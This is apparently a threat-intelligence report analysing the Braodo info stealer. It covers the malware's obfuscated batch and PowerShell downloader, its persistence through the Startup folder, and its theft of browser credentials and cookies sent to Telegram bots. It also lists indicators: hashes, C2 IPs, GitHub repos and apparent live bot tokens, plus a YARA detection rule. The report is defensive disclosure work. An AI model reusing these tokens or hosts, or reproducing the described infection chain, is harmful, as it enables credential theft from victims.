Self Assessment

Braodo Info Stealer Targeting Vietnam and Abroad

Published On : 2024-07-12
Share :
Braodo Info Stealer Targeting Vietnam and Abroad

EXECUTIVE SUMMARY

At CYFIRMA, our commitment is to provide timely insights into prevalent threats and malicious tactics affecting both organizations and individuals.
Braodo Stealer, a Python-based malware, has been active since early 2024 and primarily targets users in Vietnam, with additional victims in countries such as the US, Czechia, Germany, Netherlands, Singapore, and the United Kingdom. It possibly spreads through phishing and spear-phishing emails.

This malware utilizes GitHub and a Singapore-based VPS server to host and distribute its malicious code. Interestingly, the VPS server’s ASN – IP range also hosted websites that resembled Vietnam government sites on separate IPs, although these sites are no longer functional.

Developed by threat actors based in Vietnam, Braodo Stealer exfiltrates internet browser data via Telegram bots. The stolen information includes credentials from financial platforms like Coinbase, Binance, Wise.com, Payoneer, and PayPal, as well as accounts from GitHub, Amazon AWS, ResearchGate, Walmart, Shopify, LinkedIn, Twitter, TikTok, Reddit, Facebook, Instagram, Netflix, Microsoft, RiotGames, and Garena.

INTRODUCTION

During our Threat Discovery Process, the CYFIRMA Research and Advisory Team identified an open directory hosting an information stealer called Braodo Stealer, originating from Vietnam. The malware is obfuscated multiple times and uses batch scripts, PowerShell, executables (exe), HTA, and PDF files to spread. Multiple GitHub repositories are used to host the malicious code, while multiple Telegram bots are used for data exfiltration. It operates stealthily in the background, collecting and archiving data, which is then sent to Telegram bots.

KEY POINTS

  • Braodo Stealer: Python-based malware active since early 2024, targets primarily Vietnam with victims also in the U.S., the Czech, Germany, the Netherlands, Singapore, and the UK.
  • Utilizes GitHub and a Singapore-based VPS server for hosting and distributing malicious code.
  • VPS server’s ASN/IPs also host non-functional sites resembling Vietnam government sites.
  • Developed by cyber criminals based in Vietnam; exfiltrates data via Telegram bots.
  • Implements multi-threaded code to steal data from Chrome, Firefox, Edge, Opera, Brave, and Chromium browsers.

    ETLM ATTRIBUTION

    The Cyfirma research team consistently explores emerging threats, malware, and Tactics, Techniques and Procedures (TTPs) employed by threat actors. We actively monitor existing threats, track ongoing campaigns, assess their progress, and stay vigilant for any novel developments within this landscape.

    Braodo stealer malware de-obfuscates itself and downloads a second-stage payload hosted on GitHub. The following GitHub repositories were identified as hosting the Braodo Stealer malware: See Figures 1 & 2.

    Figure 1

    Figure 2

    We discovered multiple variants of Braodo stealer downloader (in formats like BAT, MSI, HTA) and python payloads (like Document.zip, Documentt.zip), all hosted on an open directory HTTP server at the IP: 103[.]54[.]153[.]116. (Refer to Figure 3 for details.)

    Figure 3

    The multiple variants include BAT, MSI, and HTA all delivering the same python payload of Braodo Stealer, which steals browser data from victims.

    Among the aforementioned variants, the ‘breakingbad.bat’ script is an obfuscated script. Upon de-obfuscation, it reveals another hosting server – 45[.]147[.]97[.]170 – associated with threat actors. See Figure 4.

    Figure 4

    Both servers, ‘103[.]54[.]153[.]116′ and ’45[.]147[.]97[.]170’, appear to be hosting services located in Singapore and France, respectively.

    Interestingly, the ASN of the Singapore IP, 103[.]54[.]153[.]116, hosts a few other services that appear to be non-functional Vietnam government web pages or possibly phishing pages. These IPs share the same ASN, computer name, and OS build as the threat actor’s IP. See Figures 5 & 6.

    Figure 5

    Figure 6

    Based on the titles of the above webpages, they seem to be named “VNeID – National Population Data Center” and “PUBLIC SERVICE PORTAL POLICE”. These pages resemble Vietnam government websites; however, apart from their appearances, we did not find any direct links to official government websites.

    Braodo stealer steals browser cookies, saves credentials, and uses telegram channels to exfiltrate the stolen data.

    We have identified the following Telegram bots involved in the campaign.

    Bot Username Admin Username Admin Name Bot Token
    efwfwfefbot KhanSamlain Samlain Khan bot7120180818:AAEBAEYZZ44zM8wICJ-bJTLHKbnhDEYwVrk
    hhhaksdjkbot lb996899 Lu Ba bot7120260932:AAE2zApf_cqTt57pmwxJUodvBar2l7x7fbA
    sjcajjksckakscbot ThomasDante1987 Dante 1987 Thomas bot6878187208:AAFjqOqPfUbezs5GaBB-x99QhDkXaXsWgpg
    FileWord_bot N/A N/A bot7094444204:AAFoaWZVfCF4ZyHvMpuAY0U15D3JlzxhNYg
    botdatanet_bot N/A N/A bot7147346317:AAHcazkPzwexz-_QwcdWQr96JJMKueLC6MQ
    N/A N/A N/A bot7024022476:AAFClxu17D2YaSM8zOcRBkgmvgZ2horf6LU

    Below are the Telegram chat IDs that were receiving the stolen data.

    Telegram Chat IDs
    4200000448
    4225724139
    4259156726
    5124222138
    5193250652
    5512231206

    After analyzing the data exfiltrated by Braodo stealer we found that most of the victims are from Vietnam, while others are from Singapore, the U.S., the Czech, and the Netherlands, See the Map below.

    Figure 7

    The locations mentioned above are based on the victims’ IP addresses.

    The overall distribution of victims is represented in the pie chart below.

    Figure 8

    ANALYSIS

    File Name Technical specifications of the Car (technical specifications, colors, technology…).bat
    File Type Windows Batch Script
    Size 6.01 MiB (6305181Bytes)
    SHA256 e246a68e4ff8098ffd08da24c27726a11daa84f63b27bf79b93b374d9757d032

    Upon executing the downloader batch script of Braodo Stealer malware, the following process tree is observed. (Refer to Figure 9 for details.)

    Figure 9

    Figure 9 shows multiple instances of PowerShell and cmd.exe spawned by the malware’s batch script. Ultimately, it concludes with the execution of python.exe running the ‘sim.py’ script.

    The contents of the batch script appear gibberish and are obfuscated. Please refer to Figure 10 below for details.

    Figure 10

    The operating system interprets this file content as Unicode, displaying gibberish text due to threat actors embedding bytes “FF FE 0D 0A” at the start of the script. See Figure 11.

    Figure 11

    After removing these starting bytes we can see the original obfuscated content of the script. See Figure 12.

    Figure 12

    There are numerous variables initialized and subsequently executed using the syntax below. See Figure 13.

    Figure 13

    Using a customized Python script, we decoded the obfuscated script mentioned above and observed that this code executes another PowerShell script. See Figure 14.

    Figure 14

    Expanding on the highlighted PowerShell script in above figure 14, we identified the following code. See Figure 15.

    Figure 15

    This code performs several actions:

    • It downloads two files from a GitHub repository:
      • update1.bat: This file is obfuscated similarly and is used to maintain persistence by adding the batch script to the Windows Startup folder.
      • 1.zip: This file contains the main source code of Braodo Stealer.

    The highlighted points in Figure 15 describe:

    • update1.bat is downloaded from GitHub and saved in the Windows Startup folder.
    • 1.zip is downloaded from GitHub and saved in the directory Public\Document.zip.
    • Document.zip is unarchived (extracted).
    • sim.py is executed from the unarchived directory.

    This sequence of actions enables the malware to establish persistence, retrieve its main source code, and execute its core functionality. The file Document.zip, downloaded from the GitHub repository, contains the stealer code and is located at path “Lib/sim.py”. This Python-based malware (See Figure 16) functions as an information stealer.

    Figure 16

    The stealer is named Braodo based on the variables identified in the code. See Figure 17.

    Figure 17

    Using ipinfo.io, the malware collects telemetry information about the victim. See Figure 18.

    Figure 18

    The stealer targets the following paths for browsers. See Figure 19.

    Figure 19

    Malware then dumps all running processes into the file “window.txt”, See Figures 20 & 21.

    Figure 20

    Figure 21

    Six threads are initiated to execute the function hehe(), which in turn executes the browser stealer function. See Figure 22.

    Figure 22

    The `hehe()` function launches multiple threads for each browser present on the system to steal data. The following functions are utilized by the `hehe()` function:
    Get_Chrome()
    Get_firefox()
    Get_edge()
    Get_opera()
    Get_brave()
    Get_chromium()

    Utilizing the functions described above, browser data such as cookies and saved passwords are gathered and stored in a designated exfiltration directory. This information is then compressed into an archive and sent to a Telegram channel. See Figure 23.

    Figure 23

    CONCLUSION

    Braodo Stealer represents a sophisticated threat designed to target users primarily in Vietnam, with a notable impact extending to various countries globally. This Python-based malware utilizes multifaceted techniques, including phishing emails, GitHub repositories for hosting malicious code, and Telegram channels for data exfiltration. Its ability is to obfuscate scripts and maintain persistence through startup. By targeting browser data like cookies and saved passwords, Braodo Stealer poses a significant risk of compromising sensitive information. Vigilance against phishing attempts and regular security updates are crucial defenses against such evolving threats in the cybersecurity landscape. This malware poses a significant threat, potentially leading to financial losses and identity theft for its victims.

    LIST OF IOCS

    Sr. No. Indicator Type Remarks
    1 e246a68e4ff8098ffd08da24c27726a11daa84f63b27bf79b93b374d9757d032 SHA256 Hash Technical specifications of the Car (technical specifications, colors, technology…).bat
    2 f4f843853c7a08c08181516ae2a910dfeb712e32b4ab10df23149d9f57ab581e SHA256 Hash brbad.bat
    3 6ec111b78a9788fcbca92dcc48b0d5f78d4df6a5f8d0ce96390851e832eace0d SHA256 Hash breakingbad.bat
    4 4092ff03e7a69efd728a0dd2a181fdeef99df6ebdf0e6f39140718e805efe655 SHA256 Hash breakingbad.msi
    5 4c3b91cd25650a7e1ee80164fd0598cdbf64e75ddf4ce08141aea42ee56cb134 SHA256 Hash dejin.pdf
    6 b84dc0ea50ce08686d543cc08b87792026c233afee9b029768e0648cf5b06bd8 SHA256 Hash  Documentt.zip
    7 998bb0d396dbf2ed6a412737f040228b00782267d473ceae502788451e076825 SHA256 Hash Document.zip
    8 76c0693dce55c0835ad73102541d4244b3b7ee91649890faca85290b4f9ab005 SHA256 Hash file.hta
    9 f735c170cee9e89c0318f266fc7469fde40d19eca406fbfa974b872a9b367a19 SHA256 Hash Update Browser.bat
    10 bde85da1206fa48ac5a66818023a495bb03418a32a2936afef3cdb332a2bce17 SHA256 Hash UpdateBrowser.msi
    11 f65c51f438241475dd8856ffa578610cfabab4aa8b52a09febf5ae061a5f42f7 SHA256 Hash via us.txt.zip
    12 c15dee4fe227d6311f612f3aacc86080e2f8c450ad3b78d1271603891ec61a52 SHA256 Hash ViaUs.txt.zip
    13 103[.]54[.]153[.]116 C2 Hosts Malware
    14 45[.]147[.]97[.]170 C2 Hosts Malware
    15 github[.]com/s123s1/s/ Github Repo Hosts Malware
    16 github[.]com/vtbg1/s/ Github Repo Hosts Malware
    17 github[.]com/zzhshsss/s/ Github Repo Hosts Malware
    18 bot7120180818:AAEBAEYZZ44zM8wICJ-bJTLHKbnhDEYwVrk Telegram Bot Exfiltration Telegram
    19 bot7120260932:AAE2zApf_cqTt57pmwxJUodvBar2l7x7fbA Telegram Bot Exfiltration Telegram
    20 bot6878187208:AAFjqOqPfUbezs5GaBB-x99QhDkXaXsWgpg Telegram Bot Exfiltration Telegram
    21 bot7094444204:AAFoaWZVfCF4ZyHvMpuAY0U15D3JlzxhNYg Telegram Bot Exfiltration Telegram
    22 bot7147346317:AAHcazkPzwexz-_QwcdWQr96JJMKueLC6MQ Telegram Bot Exfiltration Telegram
    23 bot7024022476:AAFClxu17D2YaSM8zOcRBkgmvgZ2horf6LU Telegram Bot Exfiltration Telegram

    MITRE ATT&CK TTPs

    Sr. No. Tactic Technique
    1 Execution (TA0002) T1059 : Command and Scripting Interpreter
    T1064 : Scripting
    2 Persistence (TA003) T1547.001 : Startup Folder
    3 Credential Access (TA006) T1555.003 Credentials from Web Browsers
    T1606.001 : Web Cookies
    4 Discovery (TA007) T1057: Process Discovery
    T1083: File and Directory Discovery
    5 Collection (TA009) T1005 : Data from Local System
    6 Exfiltration (TA0010) T1041 : Exfiltration Over C2 Channel
    7 Command and Control (TA0011) T1071.001 : Web Protocols

    YARA Rul

    rule Braodo_Stealer
    {
    meta:
    description = “Braodo Information Stealer Batch script – Detection Rule”
    author = “CRT”
    date = “2024-07-09”
    version = “1.0”
    malware_type = “Info Stealer”
    strings:
    $bytes1 = {FF FE 0D 0A}
    $patt1 = /%%..%%..%%..%%..%%..%%..%%..%%..%%..%%/ ascii wide nocase
    $str1 = “EnableDelayedExpansion” ascii wide nocase
    condition:
    filesize >= 5MB and
    $bytes1 at 0 and
    #patt1 >=800000 and
    $str1
    }

    RECOMMENDATIONS

    • Deploy strong endpoint security solutions equipped with advanced threat detection and prevention capabilities to effectively identify and stop malicious activities.
    • Use reputable antivirus and anti-malware software that can quickly detect and remove malicious payloads to bolster overall system security.
    • Keep operating systems, applications, and security software up to date with regular patches to mitigate known vulnerabilities frequently exploited by cyber threats.
    • Implement network segmentation to restrict lateral movement, preventing malware from reaching critical assets and containing potential threats within isolated areas.
    • Conduct comprehensive employee training on recognizing phishing threats, emphasizing the risks associated with opening attachments or clicking links in unsolicited emails.
    • Educate employees to identify social engineering tactics, empowering them to avoid falling prey to deceptive strategies that may lead to the execution of malicious files.
    • Configure firewalls to block outbound communication with known malicious IP addresses and domains associated with command-and-control servers.
    • Employ behavior-based monitoring to detect unusual activity patterns, including suspicious processes attempting unauthorized network connections.
    • Enforce application whitelisting policies to allow only approved applications, thereby preventing the execution of unauthorized or malicious executables.
    • Monitor network traffic for abnormal patterns, such as large data transfers to unfamiliar or suspicious IP addresses, indicating potential threats.
    • Develop a comprehensive incident response plan detailing necessary actions in the event of a malware infection, including isolating affected systems and promptly notifying relevant stakeholders.
    • Stay updated with the latest threat intelligence reports and indicators of compromise related to malware to proactively detect and mitigate potential threats.
    • Implement regular backups of critical data and systems to minimize the impact of ransomware attacks or data loss resulting from malware infections.
    • Follow the principle of least privilege (PoLP) by restricting user permissions to only those necessary for specific roles, reducing the impact of malware that relies on elevated privileges.
    • Establish and maintain defensive measures by monitoring and blocking Indicators of Compromise (IOCs), enhancing defenses based on tactical intelligence and provided rules.